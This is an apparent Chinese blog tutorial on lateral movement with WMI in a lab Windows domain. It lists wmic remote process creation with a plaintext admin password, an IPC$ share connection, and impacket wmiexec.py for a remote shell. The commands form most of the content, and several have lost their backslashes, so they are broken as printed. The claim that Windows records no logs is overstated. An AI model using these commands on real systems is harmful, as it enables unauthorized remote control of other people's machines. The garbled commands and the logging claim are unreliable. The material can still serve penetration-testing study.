windows监控txt写入_WMI(windows管理模块)横向渗透

45f1fa8860e3e4de752011257299ead5.png

自从PsExec被杀毒软件监控之后,黑客们又开始转移到WMI上,通过渗透测试发现,使用wmiexec进行横向移动时,windows操作系统竟然无动于衷,没有做任何日志记录。于是,越来越多的APT高级持续性威胁,开始了对WMI进行攻击研究~

1、使用WMI远程命令执行

  • win7域用户--> windows server 2012域用户(成功)
wmic /node:192.168.160.143 /user:HACKBIJIAdministrator /password:W2ngluoanquan process call create "cmd.exe /c ipconfig >c:ip.txt"

4b5194e153614808c3be2c7b1132f1be.png
  • 去windows server 2012域用户的C盘下,可以发现生成的 ip.txt 文件

07fd1925a3d28a69766678198ab05a58.png
  • 建立IPC$ (win7域用户--> windows server 2012域用户)
net use 192.168.160.143ipc$ "W2ngluoanquan" /user:HACKBIJIAdministrator

2c110822217ea0dd58f42fdd29c4ffb9.png
  • 获取ip.txt文件信息 (windows server 2012域用户)
type 192.168.160.143c$ip.txt

8bca94506083f6c264071b8a71609d2e.png

2、impacket工具包中的wmiexec

  • impacket的github官方地址
  • kali --> windows server 2012 (成功)
  • 获取远程windows系统的控制权
  • 不需要输入域信息
  • 进入impacket目录,先执行pip install . 安装依赖
  • 然后就可以轻松拿到远程windows server 2012系统的控制权了
python wmiexec.py Administrator:W2ngluoanquan@192.168.160.143

e6ed3b7b6129484e051253e620e1092b.png

本篇完~

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值